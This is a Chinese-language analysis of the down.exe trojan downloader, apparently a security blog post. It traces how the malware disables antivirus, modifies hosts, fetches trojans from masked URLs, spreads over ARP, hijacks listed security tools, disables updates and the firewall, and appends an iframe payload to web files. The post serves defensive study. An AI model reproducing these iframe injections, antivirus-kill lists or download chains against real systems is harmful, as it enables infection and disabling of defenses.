作者:清新阳光 ( [url]http://hi.baidu.com/newcenturysun[/url] )
File: down.exe
Size: 37888 bytes
MD5: D1622CB6B28D5239DE0FB22D44FB5C6D
SHA1: 7DA3B63227D556619CFCA2F73E553873B9EE596E
CRC32: D795BAE2
运行后 在%temp%文件夹下 生成未命名1.vbs
调用wscript.exe直接运行1.vbs文件
随即wscript.exe则主导了病毒的全部破坏过程
1.结束杀毒软件
下载Http://*/down/fuzhu/ruixing.exe
到C:\WINDOWS\Help\ruixing.exe
利用模拟按键等方式结束瑞星杀毒软件和防火墙
2.修改hosts文件
下载Http://*/down/fuzhu/Hosts.exe
根据http://*/okla.txt 里面的内容修改hosts文件
3.利用ntsd命令结束其他一些病毒以及某些安全软件的进程
kvmxbis.exe
rsmyasp.exe
ratbbtl.exe
avwgbst.exe
kawdbaz.exe
raqjatl.exe
avzxast.exe
ping.exe
system.exe
runiep.exe
myhins.exe
jziins.exe
kaqhcaz.exe
nslkupi.exe
scvhost.exe
kvdxbis.exe
4.下载木马
Http://*/down/game/100.exe~Http://*/down/game/113.exe
到system文件夹下 分别命名为jopen1.exe~jopen14.exe
下载间隔 1000ms
5.运行木马
分别由wscript.exe运行下载的jopen1.exe~jopen14.exe木马
运行每个木马之间的时间间隔 1000ms
木马植入完毕后,生成如下文件(包括但不限于)
C:\WINDOWS\system32\avwg*.dll
C:\WINDOWS\system32\avwg*.exe
C:\WINDOWS\system32\avzx*.dll
C:\WINDOWS\system32\avzx*.exe
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\DiskMan32.dll
C:\WINDOWS\system32\jgxnixodtj.dll
C:\WINDOWS\system32\kawd*.dll
C:\WINDOWS\system32\kawd*.exe
C:\WINDOWS\system32\kvdx*.dll
C:\WINDOWS\system32\kvdx*.exe
C:\WINDOWS\system32\kvmx*.dll
C:\WINDOWS\system32\kvmx*.exe
C:\WINDOWS\system32\lhypiyncsh.dll
C:\WINDOWS\system32\RacvSvc.EXE
C:\WINDOWS\system32\raqj*.dll
C:\WINDOWS\system32\raqj*.exe
C:\WINDOWS\system32\ratb*.dll
C:\WINDOWS\system32\ratb*.exe
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\DiskMan32.exe
C:\WINDOWS\upxdnd.exe...
6.删除对机器狗的免疫:
休息5000ms后
下载http://*/down/fuzhu/dogdel.exe到system文件夹下
间隔1000ms后 运行dogdel.exe
dogdel.exe调用cmd.exe删除c:\WINDOWS\system32\drivers\pcihdd.sys
以删除电脑对于机器狗的免疫
7.下载并运行机器狗病毒:
休息5000ms后
下载http://*/down/fuzhu/dog.exe到C:\WINDOWS\Help\explorer.exe下
为避免机器狗病毒加载驱动不成功,wscript.exe会运行C:\WINDOWS\Help\explorer.exe3次 每次间隔10000ms
8.arp传播:
下载Http://*/down/arp/run.txt到C:\WINDOWS\Help\arpkk.vbs下面
由wscript执行C:\WINDOWS\Help\arpkk.vbs脚本
执行过程如下:
下载
Http://*/down/arp/arp.exe
Http://*/down/arp/npf.txt
Http://*/down/arp/Packet.dll
Http://*/down/arp/WanPacket.dllHttp://*/down/arp/wpcap.dll
Http://*/down/arp/run.txt
到C:\WINDOWS\Debug下 分别命名为jopenarp.exe,npf.sys,Packet.dll,WanPacket.dll,wpcap.dll,run.bat
然后调用cmd命令把npf.txt
Packet.dll
WanPacket.dllwpcap.dll
分别拷贝到%system32%下和%system32%\drivers下面
执行run.bat 由jopenarp.exe向局域网内192.168.0.1~192.168.0.254网段的机器的80端口插入<iframe src='http://*/arp.htm' width=50
height=1></iframe>的代码
9.镜象劫持杀毒软件并破坏自动更新和windows防火墙
下载http://*/down/reg/reg.txt作为reg文件 并导入注册表
劫持如下杀毒软件或者安全工具
360rpts.exe
360Safe.exe
360tray.exe
adam.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
KPFW32.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvolself.exe
KVScan.kxp
KVSrvXP.exe
mmsk.exe
PFW.exe
PFWLiveUpdate.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavTask.exe
runiep.exe
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE
把HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv
和HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess
的启动选项都设定为disabled 关闭自动更新和windows防火墙
10.感染本机所有Html HTM ASP ASPX文件:
下载http://*/down/fuzhu/html.txt到C:\WINDOWS\Help\htm.bat
下载http://*/down/fuzhu/asp.txt到C:\WINDOWS\Help\asp.bat
批处理遍历c~z盘 在html,htm,asp,aspx文件
末尾最后插入<iframe src="http://*/arp.htm" width=50 height=0></iframe>的代码
清除办法比较繁琐,就不细讲了,要清除相应的木马群(之前介绍过的随机7位dll),恢复映像劫持,修复受感染的html等文件
要说的是 此类具有综合破坏性的病毒应该是以后病毒的主流,它们会利用多种方式传播自身,感染机器中的htm等文件,破坏安全软件,最后导
致机器里木马成群,很不好恢复。
所以平时一定要做好对病毒的防范工作,杀毒软件,防护墙系统补丁一个都不能少!